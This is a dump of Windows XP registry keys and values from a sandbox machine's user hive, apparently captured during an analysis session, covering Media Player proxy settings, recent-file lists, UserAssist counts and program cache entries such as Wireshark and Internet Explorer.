HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\HTTP ProxyBypass dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\HTTP ProxyExclude ""
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\MMS
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\MMS ProxyStyle dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\MMS ProxyName ""
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\MMS ProxyPort dword:000006db
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\MMS ProxyBypass dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\MMS ProxyExclude ""
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\RTSP
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\RTSP ProxyStyle dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\RTSP ProxyName ""
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\RTSP ProxyPort dword:0000022a
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\RTSP ProxyBypass dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\RTSP ProxyExclude ""
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Setup\UserOptions
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Setup\UserOptions DesktopShortcut "no"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Setup\UserOptions QuickLaunchShortcut "yes"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Setup\CreatedLinks Shortcut4 "C:\Documents and Settings\bomber\Application Data\Microsoft\Internet Explorer\Quick Launch\Windows Media Player.lnk"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Multimedia\ActiveMovie
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Multimedia\ActiveMovie\Filter Cache
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Multimedia\ActiveMovie\Filter Cache 0 hex:e0,5a,00,00,65,68,63,66,00,00,00,00,00,00,00,00,02,01,00,00,00,00,00,00,01,00,20,00,49,00,00,00,40,00,64,00,65,00,76,00,69,00,63,00,65,00,3a,00,64,00,6d,00,6f,00,3a,00,7b,00,32,00,45,00,45,00,42,00,34,00,41,00,44,00,46,00,2d,00,34,00,35,00,37,00,38,00,2d,00,34,00,44,00,31,00,30,00,2d,00,42,00,43,00,41,00,37,00,2d,00,42,00,42,00,39,00,35,00,35,00,46,00,35,00,36,00,33,00,32,00,30,00,41,00,7d,00,7b,00,35,00,37,00,46,00,32,00,44,00,42,00,38,00,42,00,2d,00,45,00,36,00,42,00,42,00,2d,00,34,00,35,00,31,00,33,00,2d,00,39,00,44,00,34,00,33,00,2d,00,44,00,43,00,44,00,32,00,41,00,36,00,35,00,39,00,33,00,31,00,32,00,35,00,7d,00,00,00,00,00,40,00,64,00,65,00,76,00,69,00,63,00,65,00,3a,00,64,00,6d,00,6f,00,3a,00,7b,00,38,00,37,00,34,00,31,00,33,00,31,00,43,00,42,00,2d,00,34,00,45,00,43,00,43,00,2d,00,34,00,34,00,33,00,42,00,2d,00,38,00,39,00,34,00,38,00,2d,00,37,00,34,00,36,00,42,00,38,00,39,00,35,00,39,00,35,00,44,00,32,00,30,00,7d,00,7b,00,35,00,37,00,46,00,32,00,44,00,42,00,38,00,42,00,2d,00,45,00,36,00,42,00,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Uninstall
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU a hex:77,00,69,00,72,00,65,00,73,00,68,00,61,00,72,00,6b,00,2e,00,65,00,78,00,65,00,00,00,43,00,3a,00,5c,00,44,00,6f,00,63,00,75,00,6d,00,65,00,6e,00,74,00,73,00,20,00,61,00,6e,00,64,00,20,00,53,00,65,00,74,00,74,00,69,00,6e,00,67,00,73,00,5c,00,62,00,6f,00,6d,00,62,00,65,00,72,00,5c,00,4d,00,79,00,20,00,44,00,6f,00,63,00,75,00,6d,00,65,00,6e,00,74,00,73,00,00,00,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU MRUList "a"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU a "C:\Documents and Settings\bomber\My Documents\pcap"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU MRUList "a"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\* a "C:\Documents and Settings\bomber\My Documents\pcap"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\* MRUList "a"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Start Menu2\Programs Order hex:08,00,00,00,02,00,00,00,7c,09,00,00,01,00,00,00,0f,00,00,00,8a,00,00,00,00,00,00,00,7c,00,00,00,41,75,67,4d,02,00,00,00,01,00,00,00,6a,00,32,00,22,06,00,00,36,41,2b,7c,20,00,4d,49,43,52,4f,53,7e,31,2e,4c,4e,4b,00,00,40,00,03,00,04,00,ef,be,36,41,2b,7c,36,41,2b,7c,14,00,00,00,4d,00,69,00,63,00,72,00,6f,00,73,00,6f,00,66,00,74,00,20,00,55,00,70,00,64,00,61,00,74,00,65,00,2e,00,6c,00,6e,00,6b,00,00,00,1c,00,0e,00,00,00,0a,00,ef,be,01,00,00,00,1c,00,00,00,00,00,00,00,00,00,9a,00,00,00,01,00,00,00,8c,00,00,00,41,75,67,4d,02,00,00,00,01,00,00,00,7a,00,32,00,d3,02,00,00,36,41,2b,7c,20,00,4d,49,43,52,4f,53,7e,32,2e,4c,4e,4b,00,00,50,00,03,00,04,00,ef,be,36,41,2b,7c,36,41,2b,7c,14,00,00,00,4d,00,69,00,63,00,72,00,6f,00,73,00,6f,00,66,00,74,00,20,00,55,00,70,00,64,00,61,00,74,00,65,00,20,00,43,00,61,00,74,00,61,00,6c,00,6f,00,67,00,2e,00,6c,00,6e,00,6b,00,00,00,1c,00,0e,00,00,00,0a,00,ef,be,01,00,00,00,1c,00,00,00,00,00,00,00,00,00,d2,00,00,00,02,00,00,00,c4,00,00,00,41,75,67,4d,02,00,00,00,01,00,00,00,b2,00, 
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage ProgramsCache hex:09,00,00,00,0b,00,56,00,00,00,54,00,31,00,00,00,00,00,36,41,48,7e,11,00,50,72,6f,67,72,61,6d,73,00,00,3c,00,03,00,04,00,ef,be,36,41,40,7e,36,41,48,7e,14,00,26,00,50,00,72,00,6f,00,67,00,72,00,61,00,6d,00,73,00,00,00,40,73,68,65,6c,6c,33,32,2e,64,6c,6c,2c,2d,32,31,37,38,32,00,18,00,00,00,01,d4,00,00,00,d2,00,32,00,23,03,00,00,36,41,48,7e,20,00,49,4e,54,45,52,4e,7e,31,2e,4c,4e,4b,00,00,42,00,03,00,04,00,ef,be,36,41,48,7e,36,41,48,7e,14,00,00,00,49,00,6e,00,74,00,65,00,72,00,6e,00,65,00,74,00,20,00,45,00,78,00,70,00,6c,00,6f,00,72,00,65,00,72,00,2e,00,6c,00,6e,00,6b,00,00,00,1c,00,74,00,00,00,0b,00,ef,be,00,00,00,00,00,00,00,00,43,00,3a,00,5c,00,50,00,72,00,6f,00,67,00,72,00,61,00,6d,00,20,00,46,00,69,00,6c,00,65,00,73,00,5c,00,49,00,6e,00,74,00,65,00,72,00,6e,00,65,00,74,00,20,00,45,00,78,00,70,00,6c,00,6f,00,72,00,65,00,72,00,5c,00,49,00,45,00,58,00,50,00,4c,00,4f,00,52,00,45,00,2e,00,45,00,58,00,45,00,00,00,00,00,1c,00,00,00,01,dc,00,00,00,da,00,32,00,e2,02,00,00,36,41,24,83,20,00,4f,55,54,4c,4f,4f, 
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage StartMenu_Balloon_Time hex:b0,27,b0,17,df,98,cd,01, hex:f0,f5,4b,1c,e0,98,cd,01,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count HRZR_EHACNGU hex:01,00,00,00,10,00,00,00,50,e8,07,19,df,98,cd,01, hex:01,00,00,00,14,00,00,00,90,71,d8,1e,e0,98,cd,01,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count HRZR_EHACNGU:P:\JVAQBJF\flfgrz32\pzq.rkr hex:01,00,00,00,08,00,00,00,d0,cf,da,d9,de,98,cd,01, hex:01,00,00,00,09,00,00,00,90,2d,68,fb,df,98,cd,01,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count HRZR_EHACNGU:P:\Cebtenz Svyrf\Vagrearg Rkcybere\VRKCYBER.RKR hex:01,00,00,00,08,00,00,00,b0,e4,6a,a6,dd,98,cd,01, hex:01,00,00,00,09,00,00,00,d0,f4,ef,4e,df,98,cd,01,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}\iexplore Count dword:00000003
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}\iexplore Time hex:dc,07,09,00,06,00,16,00,10,00,22,00,00,00,80,02,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}\iexplore
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}\iexplore Type dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}\iexplore Flags dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}\iexplore Count dword:00000003
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}\iexplore Time hex:dc,07,09,00,06,00,16,00,10,00,22,00,00,00,44,02,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{25336920-03F9-11CF-8FD0-00AA00686F13}\iexplore Count dword:00000004 dword:00000005
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{25336920-03F9-11CF-8FD0-00AA00686F13}\iexplore Time hex:dc,07,09,00,06,00,16,00,10,00,10,00,35,00,e0,03, hex:dc,07,09,00,06,00,16,00,10,00,1e,00,05,00,51,00,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CFBFAE00-17A6-11D0-99CB-00C04FD64497}\iexplore Count dword:00000002 dword:00000003
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CFBFAE00-17A6-11D0-99CB-00C04FD64497}\iexplore Time hex:dc,07,09,00,06,00,16,00,10,00,05,00,0b,00,3c,02, hex:dc,07,09,00,06,00,16,00,10,00,1c,00,26,00,a0,01,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore Count dword:00000002 dword:00000007
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore Time hex:dc,07,09,00,06,00,16,00,10,00,10,00,2b,00,28,01, hex:dc,07,09,00,06,00,16,00,10,00,1f,00,0f,00,b0,01,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore LoadTime dword:00000088 dword:0000009d
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E2E2DD38-D088-4134-82B7-F2BA38496583}\iexplore Count dword:00000003 dword:00000004
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E2E2DD38-D088-4134-82B7-F2BA38496583}\iexplore Time hex:dc,07,09,00,06,00,16,00,10,00,10,00,2a,00,c6,03, hex:dc,07,09,00,06,00,16,00,10,00,1c,00,22,00,04,01,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}\iexplore Count dword:00000002 dword:00000007
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}\iexplore Time hex:dc,07,09,00,06,00,16,00,10,00,10,00,2b,00,ab,01, hex:dc,07,09,00,06,00,16,00,10,00,1f,00,0f,00,50,02,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache @xpsp1res.dll,-11005 "Sends and receives e-mail and newsgroup messages."
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache C:\Program Files\Wireshark\wireshark.exe "Wireshark"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache C:\Program Files\Common Files\Java\Java Update\jucheck.exe "Java(TM) Update Checker"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache C:\Program Files\Windows Media Player\setup_wm.exe "Microsoft Windows Media Configuration Utility"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache C:\WINDOWS\system32\taskmgr.exe "Windows TaskManager"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache C:\WINDOWS\explorer.exe "Windows Explorer"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache @xpsp3res.dll,-20000 "Network Diagnostics for Windows XP"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache @shell32.dll,-12691 "My Recent Documents"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache @C:\WINDOWS\system32\SHELL32.dll,-9217 "My Network Places"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache C:\WINDOWS\inf\unregmp2.exe "Microsoft Windows Media Player Setup Utility"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache C:\Program Files\Windows Media Player\wmplayer.exe "Windows Media Player"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows Media\WMSDK\General UniqueID "{ECE4B67E-5176-48A8-A4E7-7CD222821F18}"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows Media\WMSDK\General ComputerName "SANDBOX"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows Media\WMSDK\General VolumeSerialNumber dword:20d334b5
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows Media\WMSDK\Namespace LocalBase "C:\Documents and Settings\Default User\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNS.XML" "C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNS.XML"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows Media\WMSDK\Namespace DTDFile "C:\Documents and Settings\Default User\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNS.DTD" "C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNS.DTD"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows Media\WMSDK\Namespace LocalDelta "C:\Documents and Settings\Default User\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNSD.XML" "C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNSD.XML"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows Media\WMSDK\Namespace RemoteDelta "C:\Documents and Settings\Default User\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNSR.XML" "C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNSR.XML"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Netscape\Netscape Navigator\User Trusted External Applications "C:\PROGRA~1\WINDOW~2\wmplayer.exe" "Yes"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Netscape\Netscape Navigator\User Trusted External Applications C:\PROGRA~1\WINDOW~2\wmplayer.exe "Yes"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Netscape\Netscape Navigator\User Trusted External Applications "C:\Program Files\Windows Media Player\wmplayer.exe" "Yes"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Netscape\Netscape Navigator\User Trusted External Applications C:\Program Files\Windows Media Player\wmplayer.exe "Yes"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\SessionInformation ProgramCount dword:00000001 dword:00000005
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\ShellNoRoam\MUICache C:\WINDOWS\explorer.exe "Windows Explorer"

Hope you found this informative.